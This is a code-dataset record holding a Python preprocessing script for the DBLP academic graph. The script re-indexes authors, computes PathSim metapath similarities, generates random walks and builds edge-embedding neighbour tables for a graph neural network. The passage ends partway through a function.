hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
908c99834e622d23201dccbc97a257ea18feb1ba | 40,171 | py | Python | preprocess/dblp.py | dingdanhao110/Conch | befa022dd08590062213ef2a17d0cf697fa26ec4 | [
"MIT"
] | 8 | 2020-12-07T08:45:31.000Z | 2022-03-05T05:35:56.000Z | preprocess/dblp.py | dingdanhao110/Conch | befa022dd08590062213ef2a17d0cf697fa26ec4 | [
"MIT"
] | null | null | null | preprocess/dblp.py | dingdanhao110/Conch | befa022dd08590062213ef2a17d0cf697fa26ec4 | [
"MIT"
] | 2 | 2021-07-30T11:33:34.000Z | 2021-10-19T02:40:02.000Z | import numpy as np
import scipy.sparse as sp
import torch
import random
from sklearn.feature_extraction.text import TfidfTransformer
def clean_dblp(path='./data/dblp/',new_path='./data/dblp2/'):
    """Re-index labeled DBLP authors to contiguous 1-based ids.

    Reads author_label/PA/PC/PT from *path*; keeps only PA rows whose
    author appears in the label file, remaps those author ids to
    1..len(labels), copies PC/PT unchanged, and writes everything to
    *new_path*.
    """
    label_file = "author_label"
    PA_file = "PA"
    PC_file = "PC"
    PT_file = "PT"

    PA = np.genfromtxt("{}{}.txt".format(path, PA_file), dtype=np.int32)
    PC = np.genfromtxt("{}{}.txt".format(path, PC_file), dtype=np.int32)
    PT = np.genfromtxt("{}{}.txt".format(path, PT_file), dtype=np.int32)
    labels_raw = np.genfromtxt("{}{}.txt".format(path, label_file), dtype=np.int32)

    # old author id -> new contiguous 1-based id (order of the label file)
    author_map = {}
    for new_id, old_id in enumerate(labels_raw[:, 0], start=1):
        author_map[old_id] = new_id
    print(len(author_map))

    # keep only labeled authors in PA; remap their ids
    PA_new = np.asarray([[p, author_map[a]] for p, a in PA if a in author_map])
    PC_new = PC
    PT_new = PT
    labels_new = np.asarray([[author_map[a], lbl] for a, lbl in labels_raw if a in author_map])

    np.savetxt("{}{}.txt".format(new_path, PA_file), PA_new, fmt='%i')
    np.savetxt("{}{}.txt".format(new_path, PC_file), PC_new, fmt='%i')
    np.savetxt("{}{}.txt".format(new_path, PT_file), PT_new, fmt='%i')
    np.savetxt("{}{}.txt".format(new_path, label_file), labels_new, fmt='%i')
def gen_homograph(path="data/dblp2/"):
    """Merge the PA and PC edge lists into one homogeneous edge list.

    Node ids share a single space laid out as [authors | papers |
    conferences]: authors keep their 0-based ids, paper ids are shifted by
    author_max, conference ids by author_max + paper_max.  The result is
    written to "<path>homograph.txt" (one "src dst" pair per line).

    Args:
        path: data directory containing PA.txt / PC.txt (default keeps the
            previously hard-coded location for backward compatibility).
    """
    out_file = "homograph"
    PA_file = "PA"
    PC_file = "PC"

    PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
                       dtype=np.int32)
    PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
                       dtype=np.int32)

    # ids in the text files are 1-based
    PA[:, 0] -= 1
    PA[:, 1] -= 1
    PC[:, 0] -= 1
    PC[:, 1] -= 1

    paper_max = max(PA[:, 0]) + 1
    author_max = max(PA[:, 1]) + 1

    # shift papers and conferences into the shared id space
    PA[:, 0] += author_max
    PC[:, 0] += author_max
    PC[:, 1] += author_max + paper_max

    edges = np.concatenate((PA, PC), axis=0)
    np.savetxt("{}{}.txt".format(path, out_file), edges, fmt='%u')
def read_embed(path="../../../data/dblp2/",
               emb_file="APC", emb_len=16, total_nodes=18405):
    """Read a metapath2vec-style ``.emb`` file into a dense feature matrix.

    The file "<path><emb_file>_<emb_len>.emb" starts with a header line
    "n_nodes n_feature"; every following line is "<tag><id> f1 f2 ...".
    Lines whose token starts with '<' (presumably the </s> pseudo-node —
    the header count is also decremented by one for it) are skipped, and
    the leading type character is stripped, so "a123" is stored under 123.

    Args:
        path: directory containing the embedding file.
        emb_file: metapath name used in the file name.
        emb_len: embedding length encoded in the file name.
        total_nodes: number of rows of the returned feature matrix; ids
            without an embedding fall back to the first embedding row.
            The default 18405 keeps the original hard-coded DBLP size.

    Returns:
        (features, n_nodes, n_feature): features has shape
        (total_nodes, n_feature).
    """
    embedding = []
    with open("{}{}_{}.emb".format(path, emb_file, emb_len)) as f:
        n_nodes, n_feature = map(int, f.readline().strip().split())
        n_nodes -= 1  # exclude the skipped '<...>' pseudo-node from the count
        for line in f:
            arr = line.strip().split()
            if str(arr[0])[0] == '<':
                continue
            embedding.append([int(str(arr[0])[1:])] + list(map(float, arr[1:])))
    embedding = np.asarray(embedding)
    print(embedding.shape)
    print("number of nodes:{}, embedding size:{}".format(n_nodes, n_feature))

    # node id -> row of `embedding`
    emb_index = {}
    for i in range(n_nodes):
        emb_index[embedding[i, 0]] = i

    # unseen ids fall back to the first embedding row
    features = np.asarray([embedding[emb_index[i], 1:] if i in emb_index
                           else embedding[0, 1:] for i in range(total_nodes)])
    return features, n_nodes, n_feature
def dump_edge_emb(path='../data/dblp2/',emb_len=16):
    """Compute author-pair ("edge") embeddings for the APA, APAPA and APCPA
    metapaths and dump them to "<path>edge<emb_len+2>.npz".

    For every author pair connected by a metapath, the embedding mixes the
    averaged node embeddings of the connecting papers with the two endpoint
    embeddings; a PathSim score and a path count are appended as the last
    two columns of each record.  Requires the *_ps.npz PathSim matrices
    (see gen_homoadj) and the <metapath>_<emb_len>.emb node-embedding files
    to exist in *path*.

    Args:
        path: data directory with PA.txt / PC.txt, .emb and *_ps.npz files.
        emb_len: node-embedding dimension of the .emb files to read.
    """
    # dump APA
    APA_file = "APA"
    APAPA_file = "APAPA"
    APCPA_file = "APCPA"
    # node embeddings trained per metapath, indexable by shared node id
    APA_e,n_nodes,n_emb =read_embed(path=path,emb_file='APA',emb_len=emb_len)
    APCPA_e,n_nodes,n_emb =read_embed(path=path,emb_file='APCPA',emb_len=emb_len)
    PA_file = "PA"
    PC_file = "PC"
    PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
                       dtype=np.int32)
    PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
                       dtype=np.int32)
    # ids in the text files are 1-based
    PA[:, 0] -= 1
    PA[:, 1] -= 1
    PC[:, 0] -= 1
    PC[:, 1] -= 1
    # bidirectional adjacency sets: paper<->author and paper<->conference
    PAi={}
    APi={}
    PCi={}
    CPi={}
    for i in range(PA.shape[0]):
        p=PA[i,0]
        a=PA[i,1]
        if p not in PAi:
            PAi[p]=set()
        if a not in APi:
            APi[a]=set()
        PAi[p].add(a)
        APi[a].add(p)
    for i in range(PC.shape[0]):
        p=PC[i,0]
        c=PC[i,1]
        if p not in PCi:
            PCi[p]=set()
        if c not in CPi:
            CPi[c]=set()
        PCi[p].add(c)
        CPi[c].add(p)
    # APAi[x][y]: set of papers co-authored by authors x and y (symmetric)
    APAi={}
    # APCi[a][c] / CPAi[c][a]: set of papers linking author a and conference c
    APCi={}
    CPAi={}
    for v in APi:
        for p in APi[v]:
            if p not in PAi:
                continue
            for a in PAi[p]:
                if a not in APAi:
                    APAi[a] ={}
                if v not in APAi:
                    APAi[v] ={}
                if v not in APAi[a]:
                    APAi[a][v]=set()
                if a not in APAi[v]:
                    APAi[v][a]=set()
                APAi[a][v].add(p)
                APAi[v][a].add(p)
    for v in APi:
        for p in APi[v]:
            if p not in PCi:
                continue
            for c in PCi[p]:
                if v not in APCi:
                    APCi[v] ={}
                if c not in CPAi:
                    CPAi[c] ={}
                if c not in APCi[v]:
                    APCi[v][c]=set()
                if v not in CPAi[c]:
                    CPAi[c][v]=set()
                CPAi[c][v].add(p)
                APCi[v][c].add(p)
    ## APAPA; vpa1pa2
    #APAPA_emb = []
    #for v in APAi:
    #    result = {}
    #    count = {}
    #    for a1 in APAi[v]:
    #        np1 = len(APAi[v][a1])
    #        edge1 = [node_emb[p] for p in APAi[v][a1]]
    #        edge1 = np.sum(np.vstack(edge1), axis=0)  # edge1: the emd between v and a1
    #        for a2 in APAi[a1].keys():
    #            np2 = len(APAi[a1][a2])
    #            edge2 = [node_emb[p] for p in APAi[a1][a2]]
    #            edge2 = np.sum(np.vstack(edge2), axis=0)  # edge2: the emd between a1 and a2
    #            if a2 not in result:
    #                result[a2] = node_emb[a2] * (np2 * np1)
    #            else:
    #                result[a2] += node_emb[a2] * (np2 * np1)
    #            result[a2] += edge1 * np2
    #            result[a2] += edge2 * np1
    #            if a2 not in count:
    #                count[a2]=0
    #            count[a2] += np1*np2
    #    for a2 in result:
    #        if v <= a2:
    #            APAPA_emb.append(np.concatenate(([v, a2], result[a2]/count[a2], [count[a2]])))
    #APAPA_emb = np.asarray(APAPA_emb)
    #m = np.max(APAPA_emb[:, -1])
    #APAPA_emb[:, -1] /= m
    #print("compute edge embeddings {} complete".format('APAPA'))
    # PathSim matrices produced by gen_homoadj()
    APA_ps=sp.load_npz("{}{}".format(path, 'APA_ps.npz')).todense()
    APAPA_ps=sp.load_npz("{}{}".format(path, 'APAPA_ps.npz')).todense()
    APCPA_ps=sp.load_npz("{}{}".format(path, 'APCPA_ps.npz')).todense()
    # APA
    APA = APAi
    APA_emb = []
    for a1 in APA.keys():
        for a2 in APA[a1]:
            # average embedding of the connecting papers, mixed with endpoints
            tmp = [APA_e[p] for p in APA[a1][a2]]
            tmp = np.sum(tmp, axis=0)/len(APA[a1][a2])
            tmp += APA_e[a1]+APA_e[a2]
            tmp /= 3
            if a1 <= a2:
                # record layout: [a1, a2, emb..., pathsim, path count]
                APA_emb.append(np.concatenate(([a1, a2], tmp,[APA_ps[a1,a2]], [len(APA[a1][a2])])))
    APA_emb = np.asarray(APA_emb)
    print("compute edge embeddings {} complete".format(APA_file))
    # APAPA
    APAPA_emb = []
    ind1 = APAi
    ind2 = APAi
    for v in ind1:
        result = {}
        count = {}
        for a1 in ind1[v].keys():
            np1 = len(ind1[v][a1])
            edge1 = [APA_e[p] for p in ind1[v][a1]]
            edge1 = np.sum(np.vstack(edge1), axis=0)  # edge1: the emd between v and a1
            for a2 in ind2[a1].keys():
                np2 = len(ind2[a1][a2])
                edge2 = [APA_e[p] for p in ind2[a1][a2]]
                edge2 = np.sum(np.vstack(edge2), axis=0)  # edge2: the emd between a1 and a2
                # weight the middle author by the number of v-a1-a2 paths
                if a2 not in result:
                    result[a2] = APA_e[a1] * (np2 * np1)
                else:
                    result[a2] += APA_e[a1] * (np2 * np1)
                result[a2] += edge1 * np2
                result[a2] += edge2 * np1
                if a2 not in count:
                    count[a2]=0
                count[a2] += np1*np2
        for a in result:
            if v <= a:
                APAPA_emb.append(np.concatenate(([v, a], (result[a]/count[a]+APA_e[a]+APA_e[v])/5
                                                 ,[APAPA_ps[v,a]],[count[a]])))
                # f.write('{} {} '.format(v, a))
                # f.write(" ".join(map(str, result[a].numpy())))
                # f.write('\n')
    APAPA_emb = np.asarray(APAPA_emb)
    # normalise the path-count column to [0, 1]
    m = np.max(APAPA_emb[:, -1])
    APAPA_emb[:, -1] /= m
    print("compute edge embeddings {} complete".format(APAPA_file))
    #APCPA
    ind1 = APCi
    ind2 = CPAi
    APCPA_emb = []
    for v in ind1:
        result = {}
        count = {}
        if len(ind1[v]) == 0:
            continue
        for a1 in ind1[v].keys():
            np1 = len(ind1[v][a1])
            edge1 = [APCPA_e[p] for p in ind1[v][a1]]
            edge1 = np.sum(np.vstack(edge1), axis=0)  # edge1: the emd between v and a1
            for a2 in ind2[a1].keys():
                np2 = len(ind2[a1][a2])
                edge2 = [APCPA_e[p] for p in ind2[a1][a2]]
                edge2 = np.sum(np.vstack(edge2), axis=0)  # edge2: the emd between a1 and a2
                if a2 not in result:
                    result[a2] = APCPA_e[a1] * (np2 * np1)
                else:
                    result[a2] += APCPA_e[a1] * (np2 * np1)
                if a2 not in count:
                    count[a2]=0
                result[a2] += edge1 * np2
                result[a2] += edge2 * np1
                count[a2] += np1*np2
        for a in result:
            if v <= a:
                # a pair present here but with zero PathSim is unexpected; log it
                if APCPA_ps[v,a]==0: print(v,a)
                APCPA_emb.append(np.concatenate(([v, a], (result[a]/count[a]+APCPA_e[a]+APCPA_e[v])/5,
                                                 [APCPA_ps[v,a]],
                                                 [count[a]])))
                # f.write('{} {} '.format(v,a))
                # f.write(" ".join(map(str, result[a].numpy())))
                # f.write('\n')
    APCPA_emb = np.asarray(APCPA_emb)
    m = np.max(APCPA_emb[:, -1])
    APCPA_emb[:, -1] /= m
    print("compute edge embeddings {} complete".format(APCPA_file))
    # stored record width minus the two endpoint columns
    emb_len=APA_emb.shape[1]-2
    np.savez("{}edge{}.npz".format(path, emb_len),
             APA=APA_emb, APAPA=APAPA_emb, APCPA=APCPA_emb)
    print('dump npz file {}edge{}.npz complete'.format(path, emb_len))
    pass
def pathsim(A):
    """Turn a symmetric metapath count matrix into PathSim scores.

    PathSim(i, j) = 2 * A[i, j] / (A[i, i] + A[j, j]), evaluated only on
    the nonzero entries of A.  Returns a COO sparse matrix of the scores.
    """
    rows, cols = A.nonzero()
    scores = [2 * A[r, c] / (A[r, r] + A[c, c]) for r, c in zip(rows, cols)]
    return sp.coo_matrix((scores, (rows, cols)))
def gen_homoadj(path="data/dblp2/"):
    """Build author-author metapath adjacencies (APA, APAPA, APCPA),
    convert them to PathSim scores and save them as *_ps.npz files.

    Args:
        path: data directory containing PA.txt / PC.txt / PT.txt (default
            keeps the previously hard-coded location for backward
            compatibility).  Output files are written to the same
            directory.
    """
    PA_file = "PA"
    PC_file = "PC"
    PT_file = "PT"

    PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
                       dtype=np.int32)
    PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
                       dtype=np.int32)
    PT = np.genfromtxt("{}{}.txt".format(path, PT_file),
                       dtype=np.int32)

    # ids in the text files are 1-based
    PA[:, 0] -= 1
    PA[:, 1] -= 1
    PC[:, 0] -= 1
    PC[:, 1] -= 1
    PT[:, 0] -= 1
    PT[:, 1] -= 1

    paper_max = max(PA[:, 0]) + 1
    author_max = max(PA[:, 1]) + 1
    conf_max = max(PC[:, 1]) + 1

    PA = sp.coo_matrix((np.ones(PA.shape[0]), (PA[:, 0], PA[:, 1])),
                       shape=(paper_max, author_max),
                       dtype=np.float32)
    PC = sp.coo_matrix((np.ones(PC.shape[0]), (PC[:, 0], PC[:, 1])),
                       shape=(paper_max, conf_max),
                       dtype=np.float32)

    # author-author path counts along each metapath
    APA = PA.transpose() * PA
    APAPA = APA * APA
    APCPA = PA.transpose() * PC * PC.transpose() * PA

    # normalise the counts to PathSim similarity scores
    APA = pathsim(APA)
    APAPA = pathsim(APAPA)
    APCPA = pathsim(APCPA)

    sp.save_npz("{}{}".format(path, 'APA_ps.npz'), APA)
    sp.save_npz("{}{}".format(path, 'APAPA_ps.npz'), APAPA)
    sp.save_npz("{}{}".format(path, 'APCPA_ps.npz'), APCPA)
def gen_walk(path='data/dblp2/'):
    """Generate metapath-guided random walks for APCPA and APA.

    Writes "<path>APCPA.walk" and "<path>APA.walk", one walk per line.
    Tokens are type-prefixed node ids in the shared id space (authors
    first, then papers, then conferences): a=author, v=paper,
    i=conference.

    Tuning notes from the original implementation:
      (1) walks per node w: 1000 (noted as "TOO many")
      (2) walk length l: 100
      (3) vector dimension d: 128 (LINE: 128 for each order)
      (4) neighborhood size k: 7 (default is 5)
      (5) size of negative samples: 5

    Args:
        path: data directory containing PA.txt / PC.txt.
    """
    APA_file = "APA"
    APCPA_file = "APCPA"
    PA_file = "PA"
    PC_file = "PC"

    PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
                       dtype=np.int32)
    PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
                       dtype=np.int32)

    # ids in the text files are 1-based
    PA[:, 0] -= 1
    PA[:, 1] -= 1
    PC[:, 0] -= 1
    PC[:, 1] -= 1

    paper_max = max(PA[:, 0]) + 1
    author_max = max(PA[:, 1]) + 1

    # shift papers and conferences into the shared id space
    PA[:, 0] += author_max
    PC[:, 0] += author_max
    PC[:, 1] += author_max + paper_max

    # bidirectional adjacency sets: paper<->author and paper<->conference
    PAi = {}
    APi = {}
    PCi = {}
    CPi = {}
    for p, a in PA:
        PAi.setdefault(p, set()).add(a)
        APi.setdefault(a, set()).add(p)
    for p, c in PC:
        PCi.setdefault(p, set()).add(c)
        CPi.setdefault(c, set()).add(p)

    l = 100   # walk length (tokens per walk, roughly)
    w = 1000  # walks per starting author

    def pick(s):
        # random.sample() on a set raises TypeError on Python 3.11+,
        # so materialise the set before choosing.
        return random.choice(tuple(s))

    # random walks for meta-path APCPA: each step is a -> p -> c -> p -> a
    with open("{}{}.walk".format(path, APCPA_file), mode='w') as f:
        for _ in range(w):
            for a in APi:
                cur = a
                result = "a{}".format(cur)
                for _ in range(int(l / 4)):
                    p = pick(APi[cur])
                    c = pick(PCi[p])
                    result += " v{} i{}".format(p, c)
                    p = pick(CPi[c])
                    # resample until we land on a paper that has authors
                    while p not in PAi:
                        p = pick(CPi[c])
                    cur = pick(PAi[p])
                    result += " v{} a{}".format(p, cur)
                f.write(result + "\n")

    # random walks for meta-path APA: each step is a -> p -> a
    with open("{}{}.walk".format(path, APA_file), mode='w') as f:
        for _ in range(w):
            for a in APi:
                cur = a
                result = "a{}".format(cur)
                for _ in range(int(l / 2)):
                    p = pick(APi[cur])
                    cur = pick(PAi[p])
                    result += " v{} a{}".format(p, cur)
                f.write(result + "\n")
def sparse_mx_to_torch_sparse_tensor(sparse_mx):
    """Convert a scipy sparse matrix to a torch sparse tensor."""
    coo = sparse_mx.tocoo().astype(np.float32)
    row_col = np.vstack((coo.row, coo.col)).astype(np.int64)
    return torch.sparse.FloatTensor(torch.from_numpy(row_col),
                                    torch.from_numpy(coo.data),
                                    torch.Size(coo.shape))
def load_edge_emb(path, schemes, n_dim=17, n_author=5000):
    """Load per-metapath edge embeddings dumped by ``dump_edge_emb``.

    Args:
        path: directory containing "edge<n_dim>.npz".
        schemes: iterable of metapath names (keys inside the npz file).
        n_dim: record width beyond the two endpoint columns.
        n_author: number of author nodes (index matrices are
            n_author x n_author).

    Returns:
        (index, emb): ``index[s]`` is a sparse LongTensor mapping an
        (author, author) pair to a 1-based row of ``emb[s]``; row 0 of
        ``emb[s]`` is an all-zero embedding standing in for "no edge".
    """
    data = np.load("{}edge{}.npz".format(path, n_dim))
    index = {}
    emb = {}
    for scheme in schemes:
        # records are [a1, a2, emb..., pathsim, count]; store 1-based row
        # ids so that 0 can mean "no edge" in the sparse index.
        # NOTE: np.long was removed in NumPy 1.24; np.int64 is the
        # equivalent concrete dtype.
        ind = sp.coo_matrix((np.arange(1, data[scheme].shape[0] + 1),
                             (data[scheme][:, 0], data[scheme][:, 1])),
                            shape=(n_author, n_author),
                            dtype=np.int64)
        # symmetrise: copy each stored (a1 <= a2) entry onto its mirror
        ind = ind + ind.T.multiply(ind.T > ind)
        ind = sparse_mx_to_torch_sparse_tensor(ind)  # .to_dense()

        # prepend an all-zero row so index 0 maps to a null embedding
        embedding = np.zeros(n_dim, dtype=np.float32)
        embedding = np.vstack((embedding, data[scheme][:, 2:]))
        emb[scheme] = torch.from_numpy(embedding).float()
        index[scheme] = ind.long()
        print('loading edge embedding for {} complete, num of embeddings: {}'.format(scheme, embedding.shape[0]))
    return index, emb
def gen_edge_adj(path='data/dblp2', K=80, ps=True,edge_dim=66):
    """
    Build, for every metapath scheme (APA, APAPA, APCPA), the top-K
    neighbor list of each author together with edge-embedding lookup
    tables, and dump them as .npz files.

    Args:
        path: data directory (NOTE(review): the default has no trailing
            slash, so outputs are written next to, not inside, the
            directory — confirm callers pass 'data/dblp2/').
        K: neighbors kept per author; authors with fewer nonzero
            neighbors are upsampled by random repetition.
        ps: rank neighbors by PathSim (*_ps.npz) if True, else by raw
            metapath counts.
        edge_dim: edge-record width passed to load_edge_emb.

    Returns:
        None; writes node_neighs_*, node2edge_idxs_*, edge_embs_* and
        edge_node_adjs_* npz files in *path*.
    """
    PA_file = "PA"
    PC_file = "PC"
    PT_file = "PT"
    # print("{}{}.txt".format(path, PA_file))
    PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
                       dtype=np.int32)
    PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
                       dtype=np.int32)
    PT = np.genfromtxt("{}{}.txt".format(path, PT_file),
                       dtype=np.int32)
    # ids in the text files are 1-based
    PA[:, 0] -= 1
    PA[:, 1] -= 1
    PC[:, 0] -= 1
    PC[:, 1] -= 1
    PT[:, 0] -= 1
    PT[:, 1] -= 1
    paper_max = max(PA[:, 0]) + 1
    author_max = max(PA[:, 1]) + 1
    conf_max = max(PC[:,1])+1
    term_max = max(PT[:, 1]) + 1
    PA = sp.coo_matrix((np.ones(PA.shape[0]), (PA[:, 0], PA[:, 1])),
                       shape=(paper_max, author_max),
                       dtype=np.int32)
    PT = sp.coo_matrix((np.ones(PT.shape[0]), (PT[:, 0], PT[:, 1])),
                       shape=(paper_max, term_max),
                       dtype=np.int32)
    PC = sp.coo_matrix((np.ones(PC.shape[0]), (PC[:, 0], PC[:, 1])),
                       shape=(paper_max, conf_max),
                       dtype=np.int32)
    if ps:
        # rank neighbors by precomputed PathSim scores
        APA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APA_ps.npz'))).to_dense()
        APAPA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APAPA_ps.npz'))).to_dense()
        APCPA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APCPA_ps.npz'))).to_dense()
        adj = {'APA':APA_ps,'APAPA':APAPA_ps,'APCPA':APCPA_ps}
    else:
        # rank neighbors by raw metapath path counts
        APA = (PA.transpose() * PA)
        APAPA = sparse_mx_to_torch_sparse_tensor(APA * APA).to_dense().long()
        APA = sparse_mx_to_torch_sparse_tensor(APA).to_dense().long()
        APCPA = sparse_mx_to_torch_sparse_tensor(PA.transpose() * PC * PC.transpose() * PA).to_dense().long()
        adj = {'APA': APA, 'APAPA': APAPA, 'APCPA': APCPA}
    # select top-K path-count neighbors of each A. If number of neighbors>K, trunc; else upsampling
    schemes = ['APA','APAPA','APCPA']#
    index, emb=load_edge_emb(path, schemes, n_dim=edge_dim, n_author=author_max)
    node_neighs={}
    edge_neighs={}
    node2edge_idxs={}
    edge_embs={}
    edge2node_idxs={}
    edge_node_adjs={}
    for s in schemes:
        print('----{}----'.format(s))
        aa = adj[s]
        #count nonzero degree
        degree = aa.shape[1]-(aa ==0).sum(dim=1)
        print('min degree ',torch.min(degree))
        degree = degree.numpy()
        # sort each row by descending similarity
        ind = torch.argsort(aa,dim=1)
        ind = torch.flip(ind,dims=[1])
        # top-K neighbors per row; rows with degree < K are padded by
        # randomly resampling from their real neighbors
        node_neigh = torch.cat([ind[i, :K].view(1, -1) if degree[i] >= K
                                else torch.cat(
            [ind[i, :degree[i]], ind[i, np.random.choice(degree[i], K - degree[i])]]).view(1, -1)
                                for i in range(ind.shape[0])]
                               , dim=0)
        print("node_neigh.shape ",node_neigh.shape)
        mp_index = (index[s]).to_dense()
        # print(mp_index)
        # drop the pathsim and count columns; keep only the embedding part
        mp_edge = emb[s][:,:-2]
        out_dims = mp_edge.shape[1]
        # edge id for every (node, neighbor) pair (0 means "no edge")
        edge_idx_old = mp_index[
            torch.arange(node_neigh.shape[0]).repeat_interleave(K).view(-1),
            node_neigh.contiguous().view(-1)]
        print("edge_idx_old.shape ",edge_idx_old.shape)
        # densely re-number only the edges that are actually used
        old2new=dict()
        new2old=dict()
        for e in edge_idx_old.numpy():
            if e not in old2new:
                old2new[e]=len(old2new)
                new2old[old2new[e]]=e
        assert len(old2new)==len(new2old)
        print('number of unique edges ', len(old2new))
        new_embs = [ new2old[i] for i in range(len(old2new))]
        new_embs = mp_edge[new_embs]
        edge_idx = torch.LongTensor( [old2new[i] for i in edge_idx_old.numpy()]).view(-1,K)
        edge_emb = new_embs
        uq = torch.unique(edge_idx.view(-1),return_counts=True)[1]
        print ('max number of neighbors ', max(uq))
        #edge->node adj
        edge_node_adj = [[]for _ in range(len(old2new))]
        for i in range(edge_idx.shape[0]):
            for j in range(edge_idx.shape[1]):
                edge_node_adj[ edge_idx.numpy()[i,j] ].append(i)
        edge_node_adj = [np.unique(i) for i in edge_node_adj]
        # pad single-endpoint edges by repeating the endpoint
        edge_node_adj = np.array([xi if len(xi)==2 else [xi[0],xi[0]] for xi in edge_node_adj])
        # print(max(map(len, edge_node_adj)))
        # edge_node_adj = np.array(edge_node_adj)
        print('edge_node_adj.shape ', edge_node_adj.shape)
        # #edges of line graph
        # line_graph_edges = torch.cat( [edge_idx.repeat_interleave(K).reshape(-1,1), edge_idx.repeat(K,1).reshape(-1,1),
        #                                torch.arange(node_neigh.shape[0]).repeat_interleave(K*K).view(-1,1)],dim=1).numpy()
        # assert line_graph_edges.shape[1]==3
        # print("line_graph_edges.shape ", line_graph_edges.shape)  # [edge1, edge2, node ]
        # #construct line graph
        # import pandas as pd
        # df = pd.DataFrame(line_graph_edges)
        # edge_neigh = df.groupby(0)[1,2].apply(pd.Series.tolist) #group by edge1; [ [e2,n], .. ]
        # max_len = max([len(i) for i in edge_neigh ])
